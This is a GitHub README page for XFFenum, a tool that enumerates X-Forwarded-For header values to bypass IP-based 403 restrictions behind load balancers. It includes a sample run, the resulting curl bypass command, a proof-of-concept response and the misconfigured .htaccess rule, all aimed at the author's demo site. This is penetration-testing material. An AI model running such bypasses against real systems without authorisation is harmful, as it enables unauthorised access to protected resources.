Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Appearance settings

vavkamil/XFFenum

BranchesTags
Open more actions menu

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
4 Commits
.github
.github
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 
xffenum.py
xffenum.py
 
 

Repository files navigation

XFFenum

A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header

Based on the enumXFF by @infosec_au

Example

vavkamil@localhost:~/XFFenum$ python3 xffenum.py -u https://xss.vavkamil.cz/xff -i 192.168.0.0/16
 __  _______ _____                          
 \ \/ /  ___|  ___|__ _ __  _   _ _ __ ___  
  \  /| |_  | |_ / _ \ '_ \| | | | '_ ` _ \ 
  /  \|  _| |  _|  __/ | | | |_| | | | | | |
 /_/\_\_|   |_|  \___|_| |_|\__,_|_| |_| |_|
 X-Forwarded-For [403 forbidden] enumeration

[i] Using URL: https://xss.vavkamil.cz/xff
[i] Using IP range: 192.168.0.0/16
[i] IP addresses in range: 65536
[i] Iterations required: 13108 

673it [00:34, 21.69it/s]

[!] Access granted with 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41
[!] curl https://xss.vavkamil.cz/xff -H "X-Forwarded-For: 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41"

Proof of Concept

vavkamil@localhost:~$ curl -i https://xss.vavkamil.cz/xff
HTTP/2 403 
date: Wed, 07 Aug 2019 20:02:41 GMT
content-type: text/html; charset=iso-8859-1
set-cookie: __cfduid=d77da0ad10e7a360cce4a28311784c12d1565208161; expires=Thu, 06-Aug-20 20:02:41 GMT; path=/; domain=.vavkamil.cz; HttpOnly; Secure
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 502bd9832d69c2db-FRA

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /xff
on this server.<br />
</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at xss.vavkamil.cz Port 80</address>
</body></html>
.htaccess
Order Deny,Allow
Deny from all
SetEnvIf X-Forwarded-For "192.168.13.37" AllowAccess
Allow from env=AllowAccess

Usage

vavkamil@localhost:~/XFFenum$ python3 xffenum.py -h
 __  _______ _____                          
 \ \/ /  ___|  ___|__ _ __  _   _ _ __ ___  
  \  /| |_  | |_ / _ \ '_ \| | | | '_ ` _ \ 
  /  \|  _| |  _|  __/ | | | |_| | | | | | |
 /_/\_\_|   |_|  \___|_| |_|\__,_|_| |_| |_|
 X-Forwarded-For [403 forbidden] enumeration

usage: xffenum.py [-h] -u URL -i IP_RANGE [-t THREADS] [--no-verify-ssl]

X-Forwarded-For [403 forbidden] enumeration

optional arguments:
  -h, --help       show this help message and exit
  -u URL           Forbidden URL patch to scan
  -i IP_RANGE      Signe IP or range to use
  -t THREADS       number of threads (default: 5)
  --no-verify-ssl  Ignore any and all SSL errors.

Have a nice day :)

References

https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/
https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html

About

X-Forwarded-For [403 forbidden] enumeration

Resources

Readme
Activity

Stars

99 stars

Watchers

2 watching

Forks

31 forks
Report repository

Releases

No releases published

Sponsor this project

Packages

 
 
 

Contributors

Languages
Morty Proxy This is a proxified and sanitized view of the page, visit original site.